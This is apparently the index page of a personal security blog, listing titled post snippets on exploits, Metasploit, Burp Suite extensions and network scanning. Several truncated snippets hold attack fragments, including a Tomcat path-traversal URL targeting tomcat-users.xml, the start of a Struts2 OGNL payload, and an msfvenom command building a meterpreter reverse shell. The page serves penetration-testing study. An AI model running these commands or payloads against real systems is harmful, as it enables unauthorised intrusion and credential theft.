Original: Security Lab
The following table gives the URLs of all the vulnerable web applications, operating system installations, old software and war games [hacking] sites. The URLs for individual applications that are part of o
2014-08-10 22:40:16 2458
Repost: Exploit - Apache Tomcat Directory/Path Traversal
http://localhost:8080/manager/text/deploy?path=/foo&config=D:/TESTING/Java/run/apache-tomcat-7.0.76/conf/tomcat-users.xml&war=1&version=/../../../../webapps/manager/users Previous URL would copy file na
2017-04-06 18:20:06 2287
Original: Exploit - RFID
RFID HackingPrepareInstall Proxmark3Check Proxmark3 / card statusCrack KeysPRNG AttackNESTED AttackDump data & Write dataPrepareInstall Proxmark3$ sudo apt-get install git build-essential libread
2017-04-01 13:24:32 2013
Original: Python - decode ip header
#!/usr/bin/python# -*- coding: utf-8 -*-from ctypes import *import socketimport structclass IP(Structure): _fields_ = [ ("ihl", c_uint8, 4), ("version", c_uint8, 4), ("to
2017-03-30 11:51:07 1592
Original: Python - NTP
In order to learn the NTP protocol and protect an NTP server against NTP DDoS attacks, we need a vulnerable NTP server. Install a vulnerable NTP Server - NTP 4.2.6 #!/bin/bash wget -c https://www.eecis.udel.edu/~nt
2017-03-28 12:41:50 1563
Original: Exploit - mysql unsha1
mysql-unsha1: Authenticate against a MySQL server without knowing the cleartext password. Abstract: This PoC shows how it is possible to authenticate against a MySQL server under certain circumstances with
2017-03-27 11:45:47 1285
Original: exploit - dahua camera backdoor
Just for security assessment. If you can exploit the dahua camera devices, username/password/cookies can be used to access camera video. Exploit Code: I’ll share it later. $ python exploit_dahua.py 192.168
2017-03-17 17:13:15 10862
Original: Python - rpcinfo
In order to scan all RPC hosts on the LAN and save them into the database, we need to create a script. $ rpcinfo -p 10.94.106.24 program vers proto port 100000 4 tcp 111 rpcbind 100
2017-03-15 13:30:03 1220
Original: Compile zmap in Mac OSX
The quickest way to install zmap on Mac OS X is: $ brew install zmap But it may sometimes fail, e.g.: $ time zmap -o icmpscan.csv --probe-module icmp_echoscan --whitelist-file=wh.txt Mar 09 12:23:26.57
2017-03-09 13:34:42 988
Original: exploit - CVE-2017-5638 - Apache Struts2 S2-045
Metasploit-FrameworkExp Code#!/usr/bin/python# -*- coding: utf-8 -*-import urllib2import httplibdef exploit(url, cmd): payload = "%{(#_='multipart/form-data')." payload += "(#[email protected]
2017-03-07 17:13:45 5617 1
Original: python - weixin bot
If you are a newbie, please just run it. If you are a developer, please use it as a module. python >>> import webwxbot >>> dir(webwxbot) >>> wx = webwxbot.WEIXINBOT() >>> dir(wx) ['__class__', '__delatt
2017-03-02 19:20:57 1043
Repost: Burpsuite - Extension: SQLipy
References: https://github.com/codewatchorg/sqlipy/blob/master/SQLiPy.py https://www.codewatch.org/blog/?p=402
2017-01-03 18:24:38 1298
Original: Burpsuite - Extension: Import Links into Sitemap
How to import links into the Sitemap? Please select “Import Links from a file” in the right menu. Note: If the links file is too large, it may cost too much! Code: from burp import IBurpExtender from burp im
2017-01-03 15:30:41 985
Original: Burpsuite - Extension: Bulk Requests
Site Map Fetcher: this extension fetches the responses of unrequested items in the site map. When browsing a target, Burp adds to the site map any items that are inferred from actual responses. Some of
2017-01-03 11:22:27 705
Original: Burpsuite - Extension: Get All Proxied Hosts
How to get all proxied hosts from the Burp Suite sitemap? from burp import IBurpExtender from burp import IContextMenuFactory from javax.swing import JMenuItem from java.util import List, ArrayList from java
2017-01-01 19:43:45 459
Original: Docker - Cannot connect to the Docker daemon
Start docker, and pull bkimminich/juice-shop. Console says: $ docker pull bkimminich/juice-shop Using default tag: latest Warning: failed to get default registry endpoint from daemon (Cannot connect to t
2016-12-27 18:21:33 4480
Original: Router - Netgear Remote Command Injection
Description: NETGEAR is aware of the security issue #582384 that allows unauthenticated web pages to pass form input directly to the command-line interface. A remote attacker can potentially inject arbit
2016-12-15 14:33:27 625
Original: Android - Application Reversing
How to pwn cocon.apk? A CTF Android apk called cocon.apk, and we need to decrypt the hash value (CTF flag). Please prepare a smartphone and install the apk file. If successful, android desktop will sho
2016-12-13 14:29:47 793
Original: Metasploit - ERROR: cannot discover where libxml2 is located on your system
metasploit-framework [rapid7-master] ->> rvm listrvm rubies=* ruby-2.3.3 [ x86_64 ]# => - current# =* - current && default# * - defaultWhen ruby is updated from ruby-2.3.1 to ruby-2.3.3. It will ma
2016-12-07 13:57:47 1560
Original: Metasploit - spawn a cmd shell into meterpreter
Generate a vbs payload with metasploit: ./msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 EXITFUNC=thread -f vbs --arch x86 --platform win No encoder or badchars specified, outpu
2016-11-01 18:45:16 1344
Original: Pentest - mysql udf privilege escalation
How to compile UDF DLL#include <stdio.h>#include <stdlib.h>enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};typedef struct st_udf_args { unsigned int arg_count; // num
2016-10-31 22:46:53 1053
Original: Python - rq / mrq / Celery
rq: Simple job queues for Python http://python-rq.org Please read the results from redis server. mrq: Mr. Queue - A distributed worker task queue in Python using Redis & gevent - https://github.com/pricingas
2016-10-26 14:01:17 1830
Original: Metasploit - auxiliary/gather/censys_search
msf > use auxiliary/gather/censys_search msf > set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX msf >set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX msf >set CENSYS_DORK rapid7Certificates Sea
2016-10-25 12:04:10 1103
Original: Metasploit - auxiliary/gather/zoomeye_search
How to use the ZoomEye API? If you are a python developer, please view ZoomEye-SDK. If not, ZoomEye API Documentation is good for you. $ sudo easy_install zoomeye-SDK or $ sudo pip install git+https://github.
2016-10-19 01:08:53 435928
Repost: PowerShell - PowerShell’s Security Guiding Principles
PS C:\Users\test\Desktop\PowerSploit-master\Exfiltration> Set-ExecutionPolicy Default Execution Policy Change The execution policy helps protect you from scripts that you do not trust. Changing the exec
2016-10-15 22:03:47 741
Repost: Pentest - PowerShell and Token Impersonation
This post will discuss bringing incognito-like functionality to PowerShell in the form of a new PowerShell script (Invoke-TokenManipulation), with some important differences. I’ll split this post up in
2016-10-15 17:58:34 810
Original: Metasploit - enum_linux
enum_linux.rc run post/linux/gather/enum_configs run post/linux/gather/enum_protections run post/linux/gather/enum_system run post/linux/gather/enum_xchat run post/linux/gather/enum_network run post/lin
2016-10-14 13:45:00 535
Original: Python - WIFI Scan
How to find weak wireless APs with SSID:BSSID ? #!/usr/bin/python# -*- coding: utf8 -*-from access_points import get_scannerdef parse_apinfo(ap): return (ap['quality'], ap['ssid'], ap['bssid'])d
2016-10-09 10:27:42 4371 1
Original: Vuln - Cisco - CVE-2016-6415 - IKE Information Disclosure
Summary A vulnerability in Internet Key Exchange version 1 (IKEv1) packet processing code in Cisco IOS, Cisco IOS XE, and Cisco IOS XR Software could allow an unauthenticated, remote attacker to ret
2016-09-29 21:26:54 1443
Original: Vuln - Cisco - CVE-2016-6366
https://github.com/RiskSense-Ops/CVE-2016-6366/ Exploit Cisco CVE-2016-6366 msf auxiliary(snmp_login) > set PASSWORD public PASSWORD => public msf auxiliary(snmp_login) > set RHOSTS 192.168.206.114 RHOST
2016-09-26 16:46:57 2905
Repost: Linux - How to check processor and cpu details
Processor/CPU details: The details about the processor that we shall be talking about include number of cores, availability of hyper threading, architecture, cache size etc. To find these details about
2016-09-20 11:17:59 1246
Original: vuln - SugarCRM 6.5.23 - REST PHP Object Injection Exploit
Deploy a vuln lab: Please install docker yourself. #!/bin/bash docker build -t sugarcrm:CVE-2016-7124 -f Dockerfile . docker run -p 3306:3306 -p 80:80 sugarcrm:CVE-2016-7124 Dockerfile # docker php tag list
2016-09-15 00:07:05 1258
Repost: How to scan whole Internet 3.7 billion IP addresses in few minutes?
Cyber security audit and ethical hacking training professionals normally use scanners to scan networks. Scanning every IP address on the internet isn’t an easy job, and if you don’t have the resour
2016-09-12 18:13:49 581
Original: Linux - mipsel/mips/arm/armeb - gdb compile
If you don’t know what buildroot is, please see https://www.uclibc.org/ How to install buildroot: root@lab:~# uname -a Linux lab 4.3.0-kali1-686-pae #1 SMP Debian 4.3.5-1kali1 (2016-02-11) i686 G
2016-08-22 17:24:32 3578
Original: Linux - mysql sql injection
select user from user where user='ro' 'ot'=0; When user is root, it should query as follows: 1. select user from user where user='ro' 'ot'=0; 2. select user from user where 'root'='ro' 'ot'=0; 3. select
2016-08-19 18:10:05 558
Original: Pentest - routersploit
$ git clone https://github.com/reverse-shell/routersploit$ sudo pip install -r requirements.txt$ python2 rsf.py ______ _ _____ _ _ _ | ___ \ | |
2016-08-16 23:21:31 2601
Original: Linux - setup a tftp server
tftp server: root@kali:~# atftpd Usage: tftpd [options] [directory] [options] may be: -t, --tftpd-timeout <value>: number of second of inactivity before exiting -r, --retry-timeout <value>: time to
2016-08-10 12:02:28 695
Original: Linux - rpcclient
Demoroot@kali:~/reports# rpcclient -U "" 10.11.1.227Enter 's password: rpcclient $> help--------------- ---------------------- CLUSAPI clusapi_open_cluster blaclusapi_ge
2016-08-06 13:37:55 2665 1
Original: exploit - SLMail 5.5 - POP3 PASS Buffer Overflow Exploit
https://www.exploit-db.com/exploits/638/#!/usr/bin/python# -*- encoding: utf-8 -*-import sysimport socketimport struct## OS Name: Microsoft Windows XP Professional# OS Version:
2016-07-26 22:30:52 3245
grep Chinese manual
2014-04-21